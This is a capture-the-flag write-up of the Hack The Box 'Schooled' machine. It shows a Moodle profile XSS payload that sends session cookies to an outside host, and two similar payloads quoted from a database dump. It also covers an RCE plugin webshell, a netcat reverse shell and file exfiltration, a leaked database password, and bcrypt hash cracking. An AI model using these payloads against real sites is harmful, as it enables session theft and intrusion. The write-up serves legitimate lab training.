Let's jump right into this interesting box, I got schooled a bit myself because while the root's flag was simple, the user's flag was not!

Start with the usual nmap scan:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-16 13:17 CEST
Nmap scan report for 10.10.10.234
Host is up (0.042s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey: 
|   2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
|   256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_  256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.73 seconds


Pass through the portal on port 80:

It seems to be an educational portal with a lot of technologies used:

Browsing the portal you begin to discover some names that could be potential users of the site or the BOX we are trying to penetrate.

- James Fernando	customer
- Jacques Philips	customer
- Venanda Mercy		customer
- Jane Higgins		member
- Lianne Carter		member
- Manuel Phillips	member
- Jamie Borham		member


The registration email (admissions@schooled.htb) suggests the domain (to be included in my /etc/hosts file) on which I must point the address of the BOX. I also discover that the contact form does not work.

A dirb session shows me nothing more than what I already know.

┌──(in7rud3r㉿kali-vm-off)-[~/Dropbox/hackthebox/_10.10.10.234 - Schooled (lin)]
└─$ dirb http://10.10.10.234/                                                             

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Apr 16 13:30:10 2021
URL_BASE: http://10.10.10.234/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.234/ ----
==> DIRECTORY: http://10.10.10.234/css/                                                                                                                   
==> DIRECTORY: http://10.10.10.234/fonts/                                                                                                                 
==> DIRECTORY: http://10.10.10.234/images/                                                                                                                
+ http://10.10.10.234/index.html (CODE:200|SIZE:20750)                                                                                                    
==> DIRECTORY: http://10.10.10.234/js/                                                                                                                    
                                                                                                                                                          
---- Entering directory: http://10.10.10.234/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                          
---- Entering directory: http://10.10.10.234/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                          
---- Entering directory: http://10.10.10.234/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                          
---- Entering directory: http://10.10.10.234/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Fri Apr 16 13:33:27 2021
DOWNLOADED: 4612 - FOUND: 1


My next step is to search for a subdomain, so I have to configure my dnsmasq. First of all the file /etc/dnsmasq.conf.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.10.234 - Schooled (lin)]
└─$ grep -v '#' /etc/dnsmasq.conf | grep .
address=/schooled.htb/10.10.10.234
listen-address=::1,127.0.0.1,10.10.14.103


The second file to change is the /etc/resolv.conf:

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.10.234 - Schooled (lin)]
└─$ cat /etc/resolv.conf 
# Generated by NetworkManager
search homenet.telecomitalia.it
# nameserver 192.168.1.1
nameserver 127.0.0.1


Finally start the service with the command "systemctl restart dnsmasq.service" and launch the scan to search subdomains with wfuzz:

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.10.234 - Schooled (lin)]
└─$ wfuzz -c -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://FUZZ.schooled.htb --hh 20750
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://FUZZ.schooled.htb/
Total requests: 5000

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                           
=====================================================================

000000162:   200        1 L      5 W        84 Ch       "moodle"                                          

Total time: 44.75148
Processed Requests: 2685
Filtered Requests: 2684
Requests/sec.: 59.99801
 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Pycurl error 6: Could not resolve host: m..schooled.htb
The --hh argument, used to exclude false positives, I identify it following a partial session that allows me to identify the unique value with which the portal on the base domain responds. Then, run the command, you will have a series of positive answers all the same, identify the value and exclude these answers with the arguments hc, hl, hw or hh.

Well, something found; add the moodle.schooled.htb domain on the /etc/hosts file, stop the service and restore your file /etc/resolv.conf.

The real study portal responds to the new domain. Obviously to see something more, you need to authenticate, but access in "guest" mode is also available (which, however, will not be useful).

By registering as a "student", you will have access to the math course.

As students, a series of sessions (too many) will be accessible, including your profile, in which the editable fields are really many. We hope for a reduced number of vulnerabilities for this portal, which already from what can be inferred from the subdomain and the name, appears to be based on the moodle platform (also recognized by the wappalyzer extension).

Unfortunately, there are also many known vulnerabilities to apply from exploit-db; it will not be so easy and quick to penetrate this first obstacle.

I went through most of the exploits listed on exploit-db, excluding a few (those that for example needed an administrator or teacher user), but couldn't find one that worked. This took me a long time, coming to the end that I was almost resigned. Exploits were basically divided into XSS (cross-site scripting) and RCE (remote code execution). The most interesting, however, were the ones that could be thrown by a teacher, but I didn't understand how I could take the credentials or the cookie needed to impersonate the teacher. Then I thought that probably the teacher's activities on the portal, given the nature of the BOX, could be automated (this credited by the fact that a message from a professor in the mathematics course reported that the profiles of the course participants would be viewed for validating their participation). So, assuming that some kind of automatism had visited my profile, pretending to be the teacher, I thought of exploiting the XSS flaw to send the cookie used by the teacher to a web server on my machine.

So, I modify my MoodleNet profile field with the value:

<img id="fakeimage"><script>document.getElementById('fakeimage').src="http://10.10.15.42:8000/" + document.cookie + ".jpg";</script>


This small script change the source of the image with my server web address followed by the cookie of the visitor of my profile. Activating the server web on my machine and waiting for the teacher visit...

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.10.234 - Schooled (lin)/attack]
└─$ php -S 10.10.15.42:8000  
[Fri Apr 23 21:52:42 2021] PHP 7.4.15 Development Server (http://10.10.15.42:8000) started
[Fri Apr 23 22:02:15 2021] 10.10.15.42:51846 Accepted
[Fri Apr 23 22:02:15 2021] 10.10.15.42:51846 [404]: (null) /MoodleSession=19e0dsks20lnmt89klm47h19ui.jpg - No such file or directory                                                                                                  
[Fri Apr 23 22:02:15 2021] 10.10.15.42:51846 Closing
[Fri Apr 23 22:02:45 2021] 10.10.15.42:52102 Accepted
[Fri Apr 23 22:02:45 2021] 10.10.15.42:52102 [404]: (null) /MoodleSession=19e0dsks20lnmt89klm47h19ui.jpg - No such file or directory                                                                                                  
[Fri Apr 23 22:02:45 2021] 10.10.15.42:52102 Closing
[Fri Apr 23 22:02:50 2021] 10.10.15.42:52156 Accepted
[Fri Apr 23 22:02:50 2021] 10.10.15.42:52156 [404]: (null) /MoodleSession=19e0dsks20lnmt89klm47h19ui.jpg - No such file or directory                                                                                                  
[Fri Apr 23 22:02:50 2021] 10.10.15.42:52156 Closing
[Fri Apr 23 22:04:15 2021] 10.10.10.234:58234 Accepted
[Fri Apr 23 22:04:15 2021] 10.10.10.234:58234 [404]: (null) /MoodleSession=es9ff36bmhpjigb8kn4jjpan6l.jpg - No such file or directory                                                                                                 
[Fri Apr 23 22:04:15 2021] 10.10.10.234:58234 Closing


Considering that the first three instances are my visit to test the exploit and waiting for some seconds, the last instance should be the teacher (or some other hacker that is visiting my profile).

Good, change the cookie on the browser:

And I'm in as the teacher:

At this point, I can go back to all the exploits that I had discarded earlier (from exploit-db) and try if they work, but with a bit of disappointment, none seem to work.

Let's not lose heart though, this BOX is there just to be penetrated, so there must be something, looking online for "moodle RCE teacher" I find an interesting video.

This seems to be the right time, following the tutorial step by step, I can log in as an administrator.

I do not propose the steps already well described in the video tutorial and which, I must say, I simply repeated to the letter.

It's still not entirely good, however, the manager I identified cannot carry out the operations described in the video, perhaps I need another manager. I try all the ones available, but none seem to fit. There must be something that escapes me, it is not possible to have come this far and get lost for so little. After some time spent thinking, I go back to the list of users I had identified at the beginning, in particular the four members of the portal, including the teacher I'm impersonating. It seems that Lianne (coincidentally a manager) is not among the participants in the course. I then proceed to add her to the course and she appears as a manager and, finally, the menu item for the administration of the portal appears. I can proceed giving all the permission to the user.

All the scripts needed to exploit the portal are available on the git repository mentioned in the video description.

HoangKien1020/Moodle_RCE
Contribute to HoangKien1020/Moodle_RCE development by creating an account on GitHub.

Once the repository is cloned, I try to install the plugin as described in the video, as is, to test if at least it works. I have to try several times, I'm probably not alone on this BOX at the time, but eventually it starts to work.

http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php?cmd=ls%20-la%20/home/
total 26 
drwxr-xr-x 4 root wheel 4 Mar 16 06:33 . 
drwxr-xr-x 16 root wheel 16 Feb 26 22:46 .. 
drwx------ 2 jamie jamie 11 Feb 28 18:13 jamie 
drwx------ 5 steve steve 14 Mar 17 14:05 steve


Well, but I don't have much chance with such a shell, I have to find something better, so I analyze the compressed file and try to understand.

What can I say, really very simple, let's try to replace the command execution with a nice reverse shell, and zip again for a new plug-in installation.

I tried running the reverse shell from the plug-in, but it didn't work, I don't know why.

And when I launch the plug-in again, my local listener receive the connection.

┌──(in7rud3r㉿Mykali)-[~/Downloads]
└─$ nc -lvp 4444           
listening on [any] 4444 ...
connect to [10.10.15.42] from schooled.htb [10.10.10.234] 16710
bash: cannot set terminal process group (2027): Can't assign requested address
bash: no job control in this shell
[www@Schooled /usr/local/www/apache24/data/moodle/blocks/rce/lang/en]$ whoami
www
[www@Schooled /usr/local/www/apache24/data/moodle/blocks/rce/lang/en]$


I am the www user, so I will not be able to do many things, surely I have to look for some credentials that allow me to elevate my privileges (I am omitting linpeas at the moment, which I normally rely on). Finally I find the credentials to access the mysql database in the portal configuration file.

[www@Schooled /usr/local/www/apache24/data/moodle]$ grep pass *
[...]
config-dist.php:// and a username/password created to access it.                         //
config-dist.php:$CFG->dbpass    = 'password';   // your database password
config-dist.php:          'dbpass' => '',    // Defaults to master password
config-dist.php:      'instance' => ['dbhost' => 'slave.dbhost', 'dbport' => '', 'dbuser' => '', 'dbpass' => ''],
config-dist.php:// Allow user passwords to be included in backup files. Very dangerous
config-dist.php:// setting as far as it publishes password hashes that can be unencrypted
config-dist.php://      $CFG->includeuserpasswordsinbackup = true;
config-dist.php:// Completely disable user creation when restoring a course, bypassing any
config-dist.php://   Print to log (for passive profiling of production servers)
config-dist.php:// password.
config-dist.php://      $CFG->upgradekey = 'put_some_password-like_value_here';
config-dist.php:// A site-wide password salt is no longer used in new installations.
config-dist.php:// $CFG->passwordsaltmain = 'a_very_long_random_string_of_characters#@6&*1';
config-dist.php:// $CFG->passwordsaltalt1 = '';
config-dist.php:// $CFG->passwordsaltalt2 = '';
config-dist.php:// $CFG->passwordsaltalt3 = '';
config-dist.php:// $CFG->passwordsaltalt19 = '';
config-dist.php:// $CFG->passwordsaltalt20 = '';
config-dist.php://           'dbpass' => 'moodle',
config-dist.php:// users passwords but would be dangerous to have a default password as everybody would know it, which would
config-dist.php:// uses of the tool and undesired accesses as well, is compulsory to set a password for the users
config-dist.php://   $CFG->tool_generator_users_password = 'examplepassword';
config.php:$CFG->dbpass    = 'PlaybookMaster2020';
[...]


To read in comfortable way, I move the files on my local machine.

-- this command is executed locally
┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.10.234 - Schooled (lin)/attack/dwnl]
└─$ nc -l -p 4445 > config.php
                                                                                                                                                                                 
-- this command is executed remotelly
[www@Schooled /usr/local/www/apache24/data/moodle]$ nc -w 3 10.10.15.42 4445 < config.php


Content of the file config.php:

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.10.234 - Schooled (lin)/attack/dwnl]
└─$ cat config.php
<?php  // Moodle configuration file

unset($CFG);
global $CFG;
$CFG = new stdClass();

$CFG->dbtype    = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'moodle';
$CFG->dbpass    = 'PlaybookMaster2020';
$CFG->prefix    = 'mdl_';
$CFG->dboptions = array (
  'dbpersist' => 0,
  'dbport' => 3306,
  'dbsocket' => '',
  'dbcollation' => 'utf8_unicode_ci',
);

$CFG->wwwroot   = 'http://moodle.schooled.htb/moodle';
$CFG->dataroot  = '/usr/local/www/apache24/moodledata';
$CFG->admin     = 'admin';

$CFG->directorypermissions = 0777;

require_once(__DIR__ . '/lib/setup.php');

// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
I tried to use the password with jamie and steve's accounts (found in the home folder) via ssh, but it didn't work.

Being mysql users, I try to connect and run some commands, but the mysql command seems to be unavailable. Don't worry, after a simple search I find it where I expected.

[www@Schooled /usr/local/www/apache24/data/moodle]$ find /usr/ -name mysql
find: /usr/local/var/db/tpm: Permission denied
find: /usr/local/var/lib/tpm: Permission denied
/usr/local/bin/mysql
/usr/local/share/bash-completion/completions/mysql
find: /usr/local/share/polkit-1/rules.d: Permission denied
/usr/local/share/mysql
/usr/local/include/mysql
/usr/local/include/mysql/mysql
/usr/local/etc/mysql
find: /usr/local/etc/mysql/keyring: Permission denied
find: /usr/local/etc/cups/ssl: Permission denied
find: /usr/local/etc/polkit-1/rules.d: Permission denied
find: /usr/local/etc/polkit-1/localauthority: Permission denied
find: /usr/local/etc/sudoers.d: Permission denied
/usr/local/lib/mysql
find: /usr/home/jamie: Permission denied
find: /usr/home/steve: Permission denied


The command doesn't seem to work at its best, and the result of the commands I run, seem to appear only after an exception caused by a system error.

[www@Schooled /usr/local/www/apache24/data/moodle]$ /usr/local/bin/mysql -u moodle -p
Enter password: PlaybookMaster2020
use moodle;
show tables;
SHOW TABLES;
select * from users;
Tables_in_moodle
mdl_analytics_indicator_calc
mdl_analytics_models
mdl_analytics_models_log
mdl_analytics_predict_samples
[...]
mdl_user
mdl_user_devices
mdl_user_enrolments
mdl_user_info_category
mdl_user_info_data
mdl_user_info_field
mdl_user_lastaccess
mdl_user_password_history
mdl_user_password_resets
mdl_user_preferences
mdl_user_private_key
[...]
ERROR 1146 (42S02) at line 4: Table 'moodle.users' doesn't exist


Either way, I can get the information I need.

id      auth    confirmed       policyagreed    deleted suspended       mnethostid      username        password  idnumber firstname       lastname        email   emailstop       icq     skype   yahoo   aim     msn     phone1  phone2     institution     department      address city    country lang    calendartype    theme   timezone        firstaccess        lastaccess      lastlogin       currentlogin    lastip  secret  picture url     description     descriptionformat  mailformat      maildigest      maildisplay     autosubscribe   trackforums     timecreated     timemodified       trustbitmask    imagealt        lastnamephonetic        firstnamephonetic       middlename      alternatename      moodlenetprofile
1       manual  1       0       0       0       1       guest   $2y$10$u8DkSWjhZnQhBk1a0g1ug.x79uhkx/sa7euU8TI4FX4TCaXK6uQk2               Guest user              root@localhost  0                                                 en       gregorian               99      0       0       0       0                       0               This user is a special user that allows read-only access to some courses.  1       1       0       2       1       0       0 1608320077       0       NULL    NULL    NULL    NULL    NULL    NULL
2       manual  1       0       0       0       1       admin   $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW               Jamie   Borham  jamie@staff.schooled.htb        0                                         Bournemouth      GB      en      gregorian               99      1608320129      1608729680      1608681411      1608729680 192.168.1.14            0                       1       1       0       0       1       0       0       1608389236 0
3       manual  1       0       0       0       1       bell_oliver89   $2y$10$N0feGGafBvl.g6LNBKXPVOpkvs8y/axSPyXb46HiFP3C9c42dhvgK               Oliver  Bell    bell_oliver89@student.schooled.htb      0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608320808      1608320808      0
4       manual  1       0       0       0       1       orchid_sheila89 $2y$10$YMsy0e4x4vKq7HxMsDk.OehnmAcc8tFa0lzj5b1Zc8IhqZx03aryC               Sheila  Orchid  orchid_sheila89@student.schooled.htb    0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608321097      1608321097      0
5       manual  1       0       0       0       1       chard_ellzabeth89       $2y$10$D0Hu9XehYbTxNsf/uZrxXeRp/6pmT1/6A.Q2CZhbR26lCPtf68wUC               Elizabeth       Chard   chard_elizabeth89@student.schooled.htb  0         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608321183      1608321183      0
6       manual  1       0       0       0       1       morris_jake89   $2y$10$UieCKjut2IMiglWqRCkSzerF.8AnR8NtOLFmDUcQa90lair7LndRy               Jake    Morris  morris_jake89@student.schooled.htb      0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608380798      1608380798      0
7       manual  1       0       0       0       1       heel_james89    $2y$10$sjk.jJKsfnLG4r5rYytMge4sJWj4ZY8xeWRIrepPJ8oWlynRc9Eim               James   Heel    heel_james89@student.schooled.htb       0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608380861      1608380861      0
8       manual  1       0       0       0       1       nash_michael89  $2y$10$yShrS/zCD1Uoy0JMZPCDB.saWGsPUrPyQZ4eAS50jGZUp8zsqF8tu               Michael Nash    nash_michael89@student.schooled.htb     0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608380931      1608380931      0
9       manual  1       0       0       0       1       singh_rakesh89  $2y$10$Yd52KrjMGJwPUeDQRU7wNu6xjTMobTWq3eEzMWeA2KsfAPAcHSUPu               Rakesh  Singh   singh_rakesh89@student.schooled.htb     0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608381002      1608381002      0
10      manual  1       0       0       0       1       taint_marcus89  $2y$10$kFO4L15Elng2Z2R4cCkbdOHyh5rKwnG4csQ0gWUeu2bJGt4Mxswoa               Marcus  Taint   taint_marcus89@student.schooled.htb     0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608381073      1608381073      0
11      manual  1       0       0       0       1       walls_shaun89   $2y$10$EDXwQZ9Dp6UNHjAF.ZXY2uKV5NBjNBiLx/WnwHiQ87Dk90yZHf3ga               Shaun   Walls   walls_shaun89@student.schooled.htb      0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608381128      1608381128      0
12      manual  1       0       0       0       1       smith_john89    $2y$10$YRdwHxfstP0on0Yzd2jkNe/YE/9PDv/YC2aVtC97mz5RZnqsZ/5Em               John    Smith   smith_john89@student.schooled.htb       0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608381193      1608381193      0
13      manual  1       0       0       0       1       white_jack89    $2y$10$PRy8LErZpSKT7YuSxlWntOWK/5LmSEPYLafDd13Nv36MxlT5yOZqK               Jack    White   white_jack89@student.schooled.htb       0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608381255      1608381255      0
14      manual  1       0       0       0       1       travis_carl89   $2y$10$VO/MiMUhZGoZmWiY7jQxz.Gu8xeThHXCczYB0nYsZr7J5PZ95gj9S               Carl    Travis  travis_carl89@student.schooled.htb      0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608381313      1608381313      0
15      manual  1       0       0       0       1       mac_amy89       $2y$10$PgOU/KKquLGxowyzPCUsi.QRTUIrPETU7q1DEDv2Dt.xAjPlTGK3i               Amy     Mac     mac_amy89@student.schooled.htb  0                                 Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608381361      1608381361      0
16      manual  1       0       0       0       1       james_boris89   $2y$10$N4hGccQNNM9oWJOm2uy1LuN50EtVcba/1MgsQ9P/hcwErzAYUtzWq               Boris   James   james_boris89@student.schooled.htb      0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608381410      1608381410      0
17      manual  1       0       0       0       1       pierce_allan    $2y$10$ia9fKz9.arKUUBbaGo2FM.b7n/QU1WDAFRafgD6j7uXtzQxLyR3Zy               Allan   Pierce  pierce_allan89@student.schooled.htb     0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608381478      1608381478      0
18      manual  1       0       0       0       1       henry_william89 $2y$10$qj67d57dL/XzjCgE0qD1i.ION66fK0TgwCFou9yT6jbR7pFRXHmIu               William Henry   henry_william89@student.schooled.htb    0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608381530      1608381530      0
19      manual  1       0       0       0       1       harper_zoe89    $2y$10$mnYTPvYjDwQtQuZ9etlFmeiuIqTiYxVYkmruFIh4rWFkC3V1Y0zPy               Zoe     Harper  harper_zoe89@student.schooled.htb       0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608381592      1608381592      0
20      manual  1       0       0       0       1       wright_travis89 $2y$10$XFE/IKSMPg21lenhEfUoVemf4OrtLEL6w2kLIJdYceOOivRB7wnpm               Travis  Wright  wright_travis89@student.schooled.htb    0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608381677      1608381677      0
21      manual  1       0       0       0       1       allen_matthew89 $2y$10$kFYnbkwG.vqrorLlAz6hT.p0RqvBwZK2kiHT9v3SHGa8XTCKbwTZq               Matthew Allen   allen_matthew89@student.schooled.htb    0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608381732      1608381732      0
22      manual  1       0       0       0       1       sanders_wallis89        $2y$10$br9VzK6V17zJttyB8jK9Tub/1l2h7mgX1E3qcUbLL.GY.JtIBDG5u               Wallis  Sanders sanders_wallis89@student.schooled.htb   0                 Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608381797      1608381797      0
23      manual  1       0       0       0       1       higgins_jane    $2y$10$n9SrsMwmiU.egHN60RleAOauTK2XShvjsCS0tAR6m54hR1Bba6ni2               Jane    Higgins higgins_jane@staff.schooled.htb 0                                 Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608382421      1608382421      0
24      manual  1       0       0       0       1       phillips_manuel $2y$10$ZwxEs65Q0gO8rN8zpVGU2eYDvAoVmWYYEhHBPovIHr8HZGBvEYEYG               Manuel  Phillips        phillips_manuel@staff.schooled.htb      0                 Bournemouth      GB      en      gregorian               99      1608681510      1619342347      1619342219      1619342347 127.0.0.1               0                       1       1       0       2       1       0       16083825371619278752       0                                               <image src=1 href=1 onerror="javascript:eval('const Http = new XMLHttpRequest();const url=&quot;http://10.10.14.187:8000/i_has_cookie.php?cookie=&quot; + document.cookie;Http.open(&quot;GET&quot;, url);Http.send();')"></image>
25      manual  1       0       0       0       1       carter_lianne   $2y$10$jw.KgN/SIpG2MAKvW8qdiub67JD7STqIER1VeRvAH4fs/DPF57JZe               Lianne  Carter  carter_lianne@staff.schooled.htb        0                         Bournemouth      GB      en      gregorian               99      0       0       0       0                       0 11       0       2       1       0       1608382633      1608382633      0
26      email   0       0       0       0       1       parker_dan89    $2y$10$MYvrCS5ykPXX0pjVuCGZOOPxgj.fiQAZXyufW5itreQEc2IB2.OSi               Dan     Parker  parker_dan89@student.schooled.htb       0                         Bournemouth      GB      en      gregorian               99      0       0       0       0               6IwNTLYu1F22aFR    0               NULL    1       1       0       2       1       0       1608386568      1608386568      0 NULL                                     NULL
27      onlineconfirm   1       0       0       0       1       parker_tim89    $2y$10$YCYp8F91YdvY2QCg3Cl5r.jzYxMwkwEm/QBGYIs.apyeCeRD7OD6S               Tim     Parker  parker_tim89@student.schooled.htb       0                 Bournemouth      GB      en      gregorian               99      1608386933      1608387350      1608386933      1608387350 192.168.1.14    ea9Xkf0O0ZWzfRh 0               NULL    1       1       0       2       1       0       1608386929 1608386929      0       NULL                                    NULL
28      onlineconfirm   1       0       0       0       1       account $2y$10$co7CsF0dTsTgJNBgW3zmfeypD2mn36qjRxb1sLw4YhRj3EC4tVZ2W               Mr      Clean   account@student.schooled.htb    0                                 AQ       en      gregorian               99      1619276030      1619276030      0       1619276030      10.10.14.187       2JW05dooSiXtqcq 0               NULL    1       1       0       2       1       0       1619276027      1619276027 0       NULL                                    NULL
29      onlineconfirm   1       0       0       0       1       account2        $2y$10$L5x7IoS/JzV5haS6P7lche9nobx2vBaewodk5sH9XW7s6dcS0RP4C               Mr      Clean   account2@student.schooled.htb   0                         AQ       en      gregorian               99      1619276311      1619280124      0       1619276311      10.10.14.187       1hviFAXHcC4whiC 0                       1       1       0       2       1       0       1619276310      1619280143 0
30      onlineconfirm   1       0       0       0       1       gionzs  $2y$10$vKGBapewkFL.kkV1ydFT4OJQLsOBOXohn8/KrymPmawi.rH6BCetK               sda.sdaisjd     jdisajidj       aaa@student.schooled.htb        0                 aijdaijda        IS      en      gregorian               99      1619277597      1619278388      0       161927759710.10.14.107     NOHel254zVCQOxI 0                       1       1       0       2       1       0       16192775881619278047       0                                               <img src="1" href="1" onerror="javascript:eval('const Http = new XMLHttpRequest();const url=&quot;http://10.10.14.107:8000/i_has_cookie.php?cookie=&quot; + document.cookie;Http.open(&quot;GET&quot;, url);Http.send();')" id="yui_3_17_2_1_1619277162263_20">
31      onlineconfirm   1       0       0       0       1       in7rud3r        $2y$10$e2urQamx20bIWkcZwHHjHOFLjZZO2eTnvHDzuvpRaLjwBMIagN9gu               in7rud3r        in7rud3r        in7rud3r@student.schooled.htb   0         en       gregorian               99      1619339960      1619340066      0       1619339960      10.10.15.42     UepkW47q8hdRO5L    0               NULL    1       1       0       2       1       0       1619339958      16193400770<img id="fakeimage"><script>document.getElementById('fakeimage').src="http://10.10.15.42:8000/" + document.cookie + ".jpg";</script>

Coincidentally, the user jamie is also an administrator in this table and the password appears to be available. Checking on the hashcat table for the format of the password, I found that it's a bcrypt algorithm.

3200	bcrypt $2*$, Blowfish (Unix)	$2a$05$LhayLxezLhK1LhWvKxCyLOj0j1u.Kj0jZ0pEmm134uzrQlFvQJLF6

Save the hash into a file and launch hashcat, hoping that something goes out:

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.10.234 - Schooled (lin)/attack/hcat]
└─$ hashcat -a 0 -m 3200 pwd.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-7300HQ CPU @ 2.50GHz, 2884/2948 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs

$2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW:!QAZ2wsx
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5G...l4qTiW
Time.Started.....: Sun Apr 25 11:32:03 2021 (7 mins, 55 secs)
Time.Estimated...: Sun Apr 25 11:39:58 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       29 H/s (8.31ms) @ Accel:2 Loops:64 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 13896/14344385 (0.10%)
Rejected.........: 0/13896 (0.00%)
Restore.Point....: 13892/14344385 (0.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:960-1024
Candidates.#1....: !QAZ2wsx -> superpet

Started: Sun Apr 25 11:30:33 2021
Stopped: Sun Apr 25 11:39:58 2021


I wish this can be good also for the ssh, to avoid all these steps next time.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.10.234 - Schooled (lin)/attack/hcat]
└─$ ssh jamie@10.10.10.234                                                         
Password for jamie@Schooled:
Last login: Tue Mar 16 14:44:53 2021 from 10.10.14.5
FreeBSD 13.0-BETA3 (GENERIC) #0 releng/13.0-n244525-150b4388d3b: Fri Feb 19 04:04:34 UTC 2021

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
